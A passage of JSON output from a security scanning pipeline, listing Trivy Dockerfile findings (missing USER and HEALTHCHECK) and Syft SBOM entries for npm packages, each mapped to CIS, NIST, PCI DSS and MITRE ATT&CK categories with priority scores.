is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", "Namespace": "builtin.dockerfile.DS002", "Query": "data.builtin.dockerfile.DS002.deny", "Resolution": "Add 'USER ' line to the Dockerfile", "Severity": "HIGH", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", "References": [ "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://avd.aquasec.com/misconfig/ds-0002" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.333333333333336, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "09a592ef82d0362e", "ruleId": "No HEALTHCHECK defined", "severity": "LOW", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "Dockerfile.test", "startLine": 0 }, "message": "No HEALTHCHECK defined", "title": "No HEALTHCHECK defined", "description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", "remediation": "https://avd.aquasec.com/misconfig/ds-0026", "references": [], "tags": [ "misconfig" ], "raw": { "Type": "Dockerfile Security Check", "ID": "DS-0026", "Title": "No HEALTHCHECK defined", "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", "Message": "Add HEALTHCHECK instruction in your Dockerfile", "Namespace": "builtin.dockerfile.DS026", "Query": "data.builtin.dockerfile.DS026.deny", "Resolution": "Add HEALTHCHECK instruction in Dockerfile", "Severity": "LOW", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", "References": [ "https://blog.aquasec.com/docker-security-best-practices", "https://avd.aquasec.com/misconfig/ds-0026" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 6.666666666666666, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 2, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "18edd79c677235d0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @alloc/quick-lru 5.2.0", "title": "@alloc/quick-lru 5.2.0", "description": "Package discovered: @alloc/quick-lru 5.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "47af215a45bf2740", "name": "@alloc/quick-lru", "version": "5.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@alloc\\/quick-lru:\\@alloc\\/quick-lru:5.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@alloc\\/quick-lru:\\@alloc\\/quick_lru:5.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@alloc\\/quick_lru:\\@alloc\\/quick-lru:5.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@alloc\\/quick_lru:\\@alloc\\/quick_lru:5.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@alloc\\/quick:\\@alloc\\/quick-lru:5.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@alloc\\/quick:\\@alloc\\/quick_lru:5.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40alloc/quick-lru@5.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@alloc/quick-lru/-/quick-lru-5.2.0.tgz", "integrity": "sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "44b56e7441c56f19", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @babel/runtime 7.29.2", "title": "@babel/runtime 7.29.2", "description": "Package discovered: @babel/runtime 7.29.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "77d76c145d8ae8f1", "name": "@babel/runtime", "version": "7.29.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@babel\\/runtime:\\@babel\\/runtime:7.29.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40babel/runtime@7.29.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.29.2.tgz", "integrity": "sha512-JiDShH45zKHWyGe4ZNVRrCjBz8Nh9TMmZG1kh4QTK8hCBTWBi8Da+i7s1fJw7/lYpM4ccepSNfqzZ/QvABBi5g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "87ac29aa779666c3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @emnapi/runtime 1.10.0", "title": "@emnapi/runtime 1.10.0", "description": "Package discovered: @emnapi/runtime 1.10.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "90f3b7ad1f28a06b", "name": "@emnapi/runtime", "version": "1.10.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@emnapi\\/runtime:\\@emnapi\\/runtime:1.10.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40emnapi/runtime@1.10.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz", "integrity": "sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA==", "dependencies": { "tslib": "^2.4.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9dddf13ce7ce2b19", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @fastify/busboy 3.2.0", "title": "@fastify/busboy 3.2.0", "description": "Package discovered: @fastify/busboy 3.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c1858ce75e8e8799", "name": "@fastify/busboy", "version": "3.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@fastify\\/busboy:\\@fastify\\/busboy:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40fastify/busboy@3.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-3.2.0.tgz", "integrity": "sha512-m9FVDXU3GT2ITSe0UaMA5rU3QkfC/UXtCU8y0gSN/GugTqtVldOBWIB5V6V3sbmenVZUIpU6f+mPEO2+m5iTaA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "81749876eac20ae8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @firebase/app-check-interop-types 0.3.2", "title": "@firebase/app-check-interop-types 0.3.2", "description": "Package discovered: @firebase/app-check-interop-types 0.3.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "71780c9abc78bb02", "name": "@firebase/app-check-interop-types", "version": "0.3.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@firebase\\/app-check-interop-types:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app-check-interop-types:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app_check_interop_types:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app_check_interop_types:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app-check-interop:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app-check-interop:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app_check_interop:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app_check_interop:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app-check:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app-check:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app_check:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app_check:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40firebase/app-check-interop-types@0.3.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@firebase/app-check-interop-types/-/app-check-interop-types-0.3.2.tgz", "integrity": "sha512-LMs47Vinv2HBMZi49C09dJxp0QT5LwDzFaVGf/+ITHe3BlIhUiLNttkATSXplc89A2lAaeTqjgqVkiRfUGyQiQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "efa61bee7bbbbcb1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @firebase/app-types 0.9.2", "title": "@firebase/app-types 0.9.2", "description": "Package discovered: @firebase/app-types 0.9.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a5bfafbacd41f0a2", "name": "@firebase/app-types", "version": "0.9.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@firebase\\/app-types:\\@firebase\\/app-types:0.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app-types:\\@firebase\\/app_types:0.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app_types:\\@firebase\\/app-types:0.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app_types:\\@firebase\\/app_types:0.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app-types:0.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app_types:0.9.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40firebase/app-types@0.9.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@firebase/app-types/-/app-types-0.9.2.tgz", "integrity": "sha512-oMEZ1TDlBz479lmABwWsWjzHwheQKiAgnuKxE0pz0IXCVx7/rtlkx1fQ6GfgK24WCrxDKMplZrT50Kh04iMbXQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "222f117f0d2bd962", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @firebase/auth-interop-types 0.2.3", "title": "@firebase/auth-interop-types 0.2.3", "description": "Package discovered: @firebase/auth-interop-types 0.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9b3141b15843b5a9", "name": "@firebase/auth-interop-types", "version": "0.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@firebase\\/auth-interop-types:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/auth-interop-types:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/auth_interop_types:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/auth_interop_types:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/auth-interop:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/auth-interop:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/auth_interop:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/auth_interop:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/auth:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/auth:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40firebase/auth-interop-types@0.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@firebase/auth-interop-types/-/auth-interop-types-0.2.3.tgz", "integrity": "sha512-Fc9wuJGgxoxQeavybiuwgyi+0rssr76b+nHpj+eGhXFYAdudMWyfBHvFL/I5fEHniUM/UQdFzi9VXJK2iZF7FQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": 